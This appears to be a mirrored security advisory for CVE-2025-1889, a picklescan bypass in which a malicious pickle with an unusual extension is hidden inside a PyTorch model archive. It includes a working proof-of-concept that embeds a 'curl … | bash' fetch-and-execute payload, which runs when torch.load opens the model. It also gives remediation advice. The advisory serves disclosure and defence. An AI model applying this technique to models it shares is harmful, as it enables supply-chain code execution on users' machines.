Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-769v-p64c-89pr

Опубликовано: 03 мар. 2025
Источник: github
Github: Прошло ревью
CVSS4: 5.3

Описание

PyTorch Model Files Can Bypass Pickle Scanners via Unexpected Pickle Extensions

CVE-2025-1889

Summary

Picklescan fails to detect hidden pickle files embedded in PyTorch model archives due to its reliance on file extensions for detection. This allows an attacker to embed a secondary, malicious pickle file with a non-standard extension inside a model archive, which remains undetected by picklescan but is still loaded by PyTorch's torch.load() function. This can lead to arbitrary code execution when the model is loaded.

Details

Picklescan primarily identifies pickle files by their extensions (e.g., .pkl, .pt). However, PyTorch allows specifying an alternative pickle file inside a model archive using the pickle_file parameter when calling torch.load(). This makes it possible to embed a malicious pickle file (e.g., config.p) inside the model while keeping the primary data.pkl file benign.

A typical attack works as follows:

  • A PyTorch model (model.pt) is created and saved normally.
  • A second pickle file (config.p) containing a malicious payload is crafted.
  • The data.pkl file in the model is modified to contain an object that calls torch.load(model.pt, pickle_file='config.p'), causing config.p to be loaded when the model is opened.
  • Since picklescan ignores non-standard extensions, it does not scan config.p, allowing the malicious payload to evade detection.
  • The issue is exacerbated by the fact that PyTorch models are widely shared in ML repositories and organizations, making it a potential supply-chain attack vector.

PoC

import os import pickle import torch import zipfile from functools import partial class RemoteCodeExecution: def __reduce__(self): return os.system, ("curl -s http://localhost:8080 | bash",) # Create a directory inside the model os.makedirs("model", exist_ok=True) # Create a hidden malicious pickle file with open("model/config.p", "wb") as f: pickle.dump(RemoteCodeExecution(), f) # Create a benign model model = {} class AutoLoad: def __init__(self, path, **kwargs): self.path = path self.kwargs = kwargs def __reduce__(self): # Use functools.partial to create a partially applied function # with torch.load and the pickle_file argument return partial(torch.load, self.path, **self.kwargs), () model['config'] = AutoLoad(model_name, pickle_file='config.p', weights_only=False) torch.save(model, "model.pt") # Inject the second pickle into the model archive with zipfile.ZipFile("model.pt", "a") as archive: archive.write("model/config.p", "model/config.p") # Loading the model triggers execution of config.p torch.load("model.pt")

Impact

Severity: High

Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.

What is the impact? Attackers can embed malicious code in PyTorch models that remains undetected but executes when the model is loaded.

Potential Exploits: This vulnerability could be exploited in supply chain attacks, backdooring pre-trained models distributed via repositories like Hugging Face or PyTorch Hub.

Recommendations

  1. Scan All Files in the ZIP Archive: picklescan should analyze all files in the archive instead of relying on file extensions.
  2. Detect Hidden Pickle References: Static analysis should detect torch.load(pickle_file=...) calls inside data.pkl.
  3. Magic Byte Detection: Instead of relying on extensions, picklescan should inspect file contents for pickle magic bytes (\x80\x05).
  4. Block the following globals: - torch.load - Block functools.partial

Пакеты

Наименование

picklescan

pip
Затронутые версииВерсия исправления

<= 0.0.21

0.0.22

EPSS

Процентиль: 10%
0.00036
Низкий

5.3 Medium

CVSS4

Дефекты

CWE-646

Связанные уязвимости

CVSS3: 9.8
nvd
11 месяцев назад

picklescan before 0.0.22 only considers standard pickle file extensions in the scope for its vulnerability scan. An attacker could craft a malicious model that uses Pickle and include a malicious pickle file with a non-standard file extension. Because the malicious pickle file inclusion is not considered as part of the scope of picklescan, the file would pass security checks and appear to be safe, when it could instead prove to be problematic.

CVSS3: 4.3
fstec
11 месяцев назад

Уязвимость метода reduce сканера безопасности для анализа файлов Pickle Python Picklescan, позволяющая нарушителю выполнить произвольный код

EPSS

Процентиль: 10%
0.00036
Низкий

5.3 Medium

CVSS4

Дефекты

CWE-646